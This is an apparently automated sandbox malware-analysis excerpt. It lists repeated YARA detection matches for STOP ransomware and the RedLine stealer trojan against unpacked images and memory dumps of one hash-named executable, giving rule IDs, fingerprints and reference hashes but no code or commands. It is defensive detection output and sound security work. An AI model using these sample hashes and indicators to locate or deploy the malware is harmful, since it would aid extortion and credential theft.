          Source: 12.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 12.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 10.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.23115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 10.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.23115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 22.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 22.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 9.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21d15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 9.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21d15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 0.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21f15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21f15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 12.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 12.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 6.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 6.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 30.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 30.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 10.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.23115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 10.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.23115a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 30.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 30.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 24.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 24.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 28.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 28.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 0.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21f15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21f15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 28.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 28.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 9.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 9.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 25.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 25.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 22.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 22.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 29.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22a15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 29.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22a15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 6.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 6.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 27.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 27.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 25.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 24.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 25.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 24.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 27.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21c15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 27.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21c15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 0000001B.00000002.1495269240.0000000002121000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000018.00000002.1411881019.00000000021C0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000016.00000002.2512068872.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000016.00000002.2512068872.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000009.00000002.1311439366.0000000002139000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000000C.00000002.2512789559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000000C.00000002.2512789559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 0000000A.00000002.1345421470.00000000007B9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000001D.00000002.1498273740.0000000002201000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000001D.00000002.1498593792.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000001B.00000002.1495333851.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000001C.00000002.1504362031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000001C.00000002.1504362031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
